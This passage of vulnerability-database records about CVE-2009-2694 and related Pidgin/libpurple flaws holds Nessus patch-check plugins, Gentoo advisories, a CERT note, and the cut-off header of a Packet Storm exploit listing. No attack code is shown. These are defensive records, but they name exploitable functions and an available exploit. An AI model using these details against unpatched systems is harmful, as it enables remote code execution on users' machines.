"SOLARIS10_119548-14.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=107319", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107319);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/03/14 12:59:00\");\n\n script_cve_id(\"CVE-2009-2694\");\n\n script_name(english:\"Solaris 10 (sparc) : 119548-14\");\n script_summary(english:\"Check for patch 119548-14\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 119548-14\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"GNOME 2.6.0: Gnome Multi-protocol instant messaging client Patch.\nDate this patch was last updated by Sun : Dec/14/09\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119548-14\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 119548-14\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119548-14\", obsoleted_by:\"\", package:\"SUNWgnome-im-client-share\", version:\"2.6.0,REV=10.0.3.2004.12.15.21.37\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119548-14\", obsoleted_by:\"\", package:\"SUNWgnome-im-client\", version:\"2.6.0,REV=10.0.3.2004.12.15.21.37\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWgnome-im-client / SUNWgnome-im-client-share\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:09:23", "references": ["http://www.nessus.org/u?275ad166"], "pluginID": "40675", "description": "pidgin upgrade to 2.6.0 for the CVE-2009-2694, insufficient input validation in msn_slplink_process_msg() and numerous other bug fixes.\nFedora 10 does not support voice and video with pidgin-2.6.0. Upgrade to Fedora 11 for this capability.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "reporter": "Tenable", "published": "2009-08-24T00:00:00", "title": "Fedora 10 : pidgin-2.6.0-1.fc10 (2009-8791)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2694"], "modified": "2015-10-21T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:10", "p-cpe:/a:fedoraproject:fedora:pidgin"], "id": "FEDORA_2009-8791.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=40675", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-8791.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40675);\n script_version (\"$Revision: 1.16 $\");\n script_cvs_date(\"$Date: 2015/10/21 22:50:39 $\");\n\n script_cve_id(\"CVE-2009-2694\");\n script_bugtraq_id(36071);\n script_xref(name:\"FEDORA\", value:\"2009-8791\");\n\n script_name(english:\"Fedora 10 : pidgin-2.6.0-1.fc10 (2009-8791)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"pidgin upgrade to 2.6.0 for the CVE-2009-2694, insufficient input\nvalidation in msn_slplink_process_msg() and numerous other bug fixes.\nFedora 10 does not support voice and video with pidgin-2.6.0. Upgrade\nto Fedora 11 for this capability.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-August/028190.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?275ad166\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected pidgin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^10([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 10.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC10\", reference:\"pidgin-2.6.0-1.fc10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"pidgin\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:35:42", "references": ["http://lists.centos.org/pipermail/centos-announce/2009-May/015891.html", "http://lists.centos.org/pipermail/centos-announce/2009-May/015937.html", "http://lists.centos.org/pipermail/centos-announce/2009-May/015892.html"], "pluginID": "43751", "description": "Updated pidgin packages that fix several security issues are now available for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple accounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file transfers when using the Extensible Messaging and Presence Protocol (XMPP). If a Pidgin client initiates a file transfer, and the remote target sends a malformed response, it could cause Pidgin to crash or, potentially, execute arbitrary code with the permissions of the user running Pidgin. This flaw only affects accounts using XMPP, such as Jabber and Google Talk. (CVE-2009-1373)\n\nA denial of service flaw was found in Pidgin's QQ protocol decryption handler. When the QQ protocol decrypts packet information, heap data can be overwritten, possibly causing Pidgin to crash. (CVE-2009-1374)\n\nA flaw was found in the way Pidgin's PurpleCircBuffer object is expanded. If the buffer is full when more data arrives, the data stored in this buffer becomes corrupted. This corrupted data could result in confusing or misleading data being presented to the user, or possibly crash Pidgin. (CVE-2009-1375)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security Advisory RHSA-2008:0584 provided an incomplete fix for the integer overflow flaw affecting Pidgin's MSN protocol handler. If a Pidgin client receives a specially crafted MSN message, it may be possible to execute arbitrary code with the permissions of the user running Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy list can send you messages. This prevents arbitrary MSN users from exploiting this flaw.\n\nAll Pidgin users should upgrade to these updated packages, which contain backported patches to resolve these issues. Pidgin must be restarted for this update to take effect.", "edition": 6, "reporter": "Tenable", "published": "2010-01-06T00:00:00", "title": "CentOS 4 / 5 : pidgin (CESA-2009:1060)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373", "CVE-2009-2694"], "modified": "2018-06-27T00:00:00", "cpe": ["p-cpe:/a:centos:centos:libpurple-tcl", "p-cpe:/a:centos:centos:pidgin-perl", "cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:finch-devel", "p-cpe:/a:centos:centos:libpurple-devel", "p-cpe:/a:centos:centos:libpurple", "p-cpe:/a:centos:centos:pidgin", "p-cpe:/a:centos:centos:finch", "p-cpe:/a:centos:centos:pidgin-devel", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:libpurple-perl"], "id": "CENTOS_RHSA-2009-1060.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=43751", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1060 and \n# CentOS Errata and Security Advisory 2009:1060 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43751);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/06/27 18:42:25\");\n\n script_cve_id(\"CVE-2008-2927\", \"CVE-2009-1373\", \"CVE-2009-1374\", \"CVE-2009-1375\", \"CVE-2009-1376\", \"CVE-2009-2694\");\n script_bugtraq_id(35067);\n script_xref(name:\"RHSA\", value:\"2009:1060\");\n\n script_name(english:\"CentOS 4 / 5 : pidgin (CESA-2009:1060)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated pidgin packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file\ntransfers when using the Extensible Messaging and Presence Protocol\n(XMPP). If a Pidgin client initiates a file transfer, and the remote\ntarget sends a malformed response, it could cause Pidgin to crash or,\npotentially, execute arbitrary code with the permissions of the user\nrunning Pidgin. This flaw only affects accounts using XMPP, such as\nJabber and Google Talk. (CVE-2009-1373)\n\nA denial of service flaw was found in Pidgin's QQ protocol decryption\nhandler. When the QQ protocol decrypts packet information, heap data\ncan be overwritten, possibly causing Pidgin to crash. (CVE-2009-1374)\n\nA flaw was found in the way Pidgin's PurpleCircBuffer object is\nexpanded. If the buffer is full when more data arrives, the data\nstored in this buffer becomes corrupted. This corrupted data could\nresult in confusing or misleading data being presented to the user, or\npossibly crash Pidgin. (CVE-2009-1375)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security\nAdvisory RHSA-2008:0584 provided an incomplete fix for the integer\noverflow flaw affecting Pidgin's MSN protocol handler. If a Pidgin\nclient receives a specially crafted MSN message, it may be possible to\nexecute arbitrary code with the permissions of the user running\nPidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy\nlist can send you messages. This prevents arbitrary MSN users from\nexploiting this flaw.\n\nAll Pidgin users should upgrade to these updated packages, which\ncontain backported patches to resolve these issues. Pidgin must be\nrestarted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.centos.org/pipermail/centos-announce/2009-May/015891.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.centos.org/pipermail/centos-announce/2009-May/015892.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.centos.org/pipermail/centos-announce/2009-May/015937.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected pidgin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:finch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:finch-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libpurple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libpurple-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libpurple-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libpurple-tcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pidgin-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pidgin-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"finch-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"finch-devel-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"libpurple-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"libpurple-devel-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"libpurple-perl-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"libpurple-tcl-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"pidgin-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"pidgin-devel-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"pidgin-perl-2.5.5-2.el4\")) flag++;\n\nif (rpm_check(release:\"CentOS-5\", reference:\"finch-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"finch-devel-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libpurple-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libpurple-devel-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libpurple-perl-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libpurple-tcl-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"pidgin-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"pidgin-devel-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"pidgin-perl-2.5.5-3.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:39", "references": ["https://security.gentoo.org/security/en/glsa/glsa-200905-07.xml", "https://bugs.gentoo.org/show_bug.cgi?id=276000", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3026", "https://bugs.gentoo.org/show_bug.cgi?id=281545", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1376", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1889", "https://bugs.gentoo.org/show_bug.cgi?id=283324", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "2.5.9-r1", "arch": "all", "packageFilename": "UNKNOWN", "packageName": "net-im/pidgin", "operator": "lt"}], "edition": 1, "description": "### Background\n\nPidgin is a client for a variety of instant messaging protocols. \n\n### Description\n\nMultiple vulnerabilities were found in Pidgin: \n\n * Yuriy Kaminskiy reported that the OSCAR protocol implementation in Pidgin misinterprets the ICQWebMessage message type as the ICQSMS message type, triggering an allocation of a large amount of memory (CVE-2009-1889).\n * Federico Muttis of Core Security Technologies reported that the msn_slplink_process_msg() function in libpurple/protocols/msn/slplink.c in libpurple as used in Pidgin doesn't properly process incoming SLP messages, triggering an overwrite of an arbitrary memory location (CVE-2009-2694). NOTE: This issue reportedly exists because of an incomplete fix for CVE-2009-1376 (GLSA 200905-07).\n * bugdave reported that protocols/jabber/auth.c in libpurple as used in Pidgin does not follow the \"require TSL/SSL\" preference when connecting to older Jabber servers that do not follow the XMPP specification, resulting in a connection to the server without the expected encryption (CVE-2009-3026).\n\n### Impact\n\nA remote attacker could send specially crafted SLP (via MSN) or ICQ web messages, possibly leading to execution of arbitrary code with the privileges of the user running Pidgin, unauthorized information disclosure, or a Denial of Service. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Pidgin users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-im/pidgin-2.5.9-r1\"", "reporter": "Gentoo Foundation", "published": "2009-10-22T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "gentoo", "title": "Pidgin: Multiple vulnerabilities", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1376", "CVE-2009-3026", "CVE-2009-1889", "CVE-2009-2694"], "modified": "2009-10-22T00:00:00", "id": "GLSA-200910-02", "href": "https://security.gentoo.org/glsa/200910-02", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-06T19:46:03", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1374", "https://security.gentoo.org/security/en/glsa/glsa-200901-13.xml", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1376", "https://bugs.gentoo.org/show_bug.cgi?id=270811", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1375", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1373"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "2.5.6", "packageName": "net-im/pidgin", "packageFilename": "UNKNOWN", "arch": "all", "operator": "lt"}], "description": "### Background\n\nPidgin (formerly Gaim) is an instant messaging client for a variety of instant messaging protocols. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Pidgin: \n\n * Veracode reported a boundary error in the \"XMPP SOCKS5 bytestream server\" when initiating an outgoing file transfer (CVE-2009-1373).\n * Ka-Hing Cheung reported a heap corruption flaw in the QQ protocol handler (CVE-2009-1374).\n * A memory corruption flaw in \"PurpleCircBuffer\" was disclosed by Josef Andrysek (CVE-2009-1375).\n * The previous fix for CVE-2008-2927 contains a cast from uint64 to size_t, possibly leading to an integer overflow (CVE-2009-1376, GLSA 200901-13).\n\n### Impact\n\nA remote attacker could send specially crafted messages or files using the MSN, XMPP or QQ protocols, possibly resulting in the execution of arbitrary code with the privileges of the user running the application, or a Denial of Service. NOTE: Successful exploitation might require the victim's interaction. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Pidgin users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-im/pidgin-2.5.6\"", "edition": 1, "reporter": "Gentoo Foundation", "published": "2009-05-25T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "gentoo", "title": "Pidgin: Multiple vulnerabilities", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "modified": "2009-05-25T00:00:00", "id": "GLSA-200905-07", "href": "https://security.gentoo.org/glsa/200905-07", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2018-08-31T02:36:54", "references": ["http://pidgin.im/news/security/?id=34", "http://www.coresecurity.com/content/libpurple-arbitrary-write#lref.4", "http://www.coresecurity.com/content/libpurple-arbitrary-write#lref.4", "http://msnpiki.msnfanatic.com/index.php/MSNC:MSNSLP", "http://msnpiki.msnfanatic.com/index.php/MSNC:MSNSLP", "http://supportwiki.cisco.com/ViewWiki/index.php/How_to_configure_the_PIX_500_Series_Firewall_with_software_version_6.x_in_order_to_block_the_MSN_messenger_with_the_access-list_command", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2694", "http://developer.pidgin.im/", "http://developer.pidgin.im/wiki/WhatIsLibpurple", "http://developer.pidgin.im/wiki/WhatIsLibpurple"], "description": "### Overview\n\nThe Libpurple instant messenger library contains a vulnerability that may allow an attacker to execute arbitrary code.\n\n### Description\n\n[Libpurple](<http://developer.pidgin.im/wiki/WhatIsLibpurple>) is an instant messenger (IM) library that is used by various programs to connect to multiple networks. Libpurple contains a buffer overflow vulnerability that can be triggered by sending specially crafted [MSNSLP](<http://msnpiki.msnfanatic.com/index.php/MSNC:MSNSLP>) messages to a program that is using an affected version of the library. \n\nFor more technical details, see CORE Advisory [CORE-2009-0727](<http://www.coresecurity.com/content/libpurple-arbitrary-write#lref.4>). \n \n--- \n \n### Impact\n\nAn attacker may be able to execute arbitrary code or cause an IM program to crash. \n \n--- \n \n### Solution\n\n**Upgrade** \nInstant messenger programs may distribute Libpurple and will provide an updated version to their users as a security update. See the systems affected portion of this document for a partial list of affected IM clients. Users who compile Libpurple or IM programs should see the Libpurple [site](<http://developer.pidgin.im/>) or their operating system vendor for updated software. \n \n--- \n \n \n**Restrict Access** \n \nThe most likely attack vector for this issue would be via the MSN IM network. Administrators may be able to temporarily mitigate this issue by blocking access to the MSN IM network. This workaround is not likely to be totally effective. \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nPidgin| | -| 21 Aug 2009 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23582244 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://pidgin.im/news/security/?id=34>\n * <http://developer.pidgin.im/wiki/WhatIsLibpurple>\n * <http://www.coresecurity.com/content/libpurple-arbitrary-write#lref.4>\n * <http://msnpiki.msnfanatic.com/index.php/MSNC:MSNSLP>\n * <http://supportwiki.cisco.com/ViewWiki/index.php/How_to_configure_the_PIX_500_Series_Firewall_with_software_version_6.x_in_order_to_block_the_MSN_messenger_with_the_access-list_command>\n\n### Credit\n\nInformation from CORE Advisory CORE-2009-0727 was used in this report. \n\nThis document was written by Ryan Giobbi.\n\n### Other Information\n\n * CVE IDs: [CVE-2009-2694](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2694>)\n * Date Public: 18 Aug 2009\n * Date First Published: 21 Aug 2009\n * Date Last Updated: 21 Aug 2009\n * Severity Metric: 10.19\n * Document Revision: 12\n\n", "edition": 4, "reporter": "CERT", "published": "2009-08-21T00:00:00", "title": "Libpurple buffer overflow vulnerability", "type": "cert", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2009-2694", "CVE-2009-2694"], "modified": "2009-08-21T00:00:00", "id": "VU:582244", "href": "https://www.kb.cert.org/vuls/id/582244", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:13", "references": [], "edition": 1, "description": "", "reporter": "Pierre Nogues", "published": "2009-09-10T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "packetstorm", "title": "Pidgin MSN 2.5.8 Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2694"], "modified": "2009-09-10T00:00:00", "href": "https://packetstormsecurity.com/files/81096/Pidgin-MSN-2.5.8-Code-Execution.html", "id": "PACKETSTORM:81096", "sourceData": "`/* \n* Pidgin MSN <= 2.5.8 Remote Code Execution \n* \n* Pierre Nogues - pierz@hotmail.it \n* http://www.indahax.com/ \n* \n* \n* Description: \n* Pidgin is a multi-protocol 